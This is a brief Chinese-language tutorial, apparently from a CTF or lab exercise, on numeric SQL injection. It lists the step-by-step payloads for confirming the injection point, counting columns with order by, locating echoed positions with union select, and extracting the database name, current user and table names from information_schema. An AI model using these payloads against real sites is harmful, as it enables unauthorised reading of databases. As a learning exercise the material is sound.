SQL注入
1.sqli数字型
:判断是否存在注入点,执行1 and 1=1
,有回显,再执行1 and 1=2
发现回显不同,判断存在注入点
:判断字段数,执行1 order by 3
以及执行1 order by 4
时报错,判断字段数为3
:判断具体回显位,执行-1 union select 1,2,3
:获取数据库名和当前用户名,执行-1 union select 1,database(),user()
:执行 -1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3
得到表名